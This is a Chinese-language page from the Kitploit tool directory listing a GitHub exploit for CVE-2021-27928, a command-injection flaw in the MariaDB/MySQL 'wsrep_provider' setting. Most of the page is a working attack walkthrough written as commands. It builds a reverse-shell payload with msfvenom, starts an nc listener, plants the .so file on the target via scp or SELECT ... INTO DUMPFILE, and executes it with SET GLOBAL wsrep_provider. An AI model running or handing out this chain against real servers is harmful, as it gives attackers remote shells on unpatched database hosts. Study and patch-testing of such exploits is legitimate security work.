Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2021-27928 — CVE-2021-27928 MariaDB/MySQL-'wsrep provider' 命令注入漏洞 | Kitploit
工具/GitHubGitHub/al1ex/cve-2021-27928
漏洞分析漏洞利用渗透测试命令与控制Payload 开发数据库安全
GitHubal1ex/cve-2021-27928

CVE-2021-27928

CVE-2021-27928 MariaDB/MySQL-'wsrep provider' 命令注入漏洞

查看仓库
631333年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

信息

root@kitploit:~
漏洞标题:MariaDB 10.2 /MySQL - 'wsrep_provider' 操作系统命令执行
日期:2021年3月18日
漏洞作者:Central InfoSec
受影响版本:
	MariaDB 10.2 版本低于 10.2.37
	10.3 版本低于 10.3.28
	10.4 版本低于 10.4.18 
	10.5 版本低于 10.5.9
Percona Server 截至 2021-03-03;以及用于 MySQL 的 wsrep 补丁截至 2021-03-03
测试环境:Linux
CVE 编号:CVE-2021-27928

如何利用

步骤1:创建反弹Shell载荷

root@kitploit:~
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f elf-so -o CVE-2021-27928.so

payload

步骤2:启动监听器

root@kitploit:~
nc -lnvp <port>

nc

步骤3:将载荷复制到目标机器

通过SCP

root@kitploit:~
scp CVE-2021-27928.so <user>@<ip>:/tmp/CVE-2021-27928.so

通过Dumpfile

root@kitploit:~
python3 -c 'print(open("CVE-2021-27928.so", "rb").read().hex())'
mysql -u <user> -p -h <ip>
SELECT UNHEX('PYTHON_OUTPUT') into dumpfile '/tmp/CVE-2021-27928.so';

步骤4:执行载荷

root@kitploit:~
mysql -u <user> -p -h <ip>
SET GLOBAL wsrep_provider="/tmp/CVE-2021-27928.so";

shell

参考

https://www.exploit-db.com/exploits/49765

https://jira.mariadb.org/browse/MDEV-25179

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27928

下载工具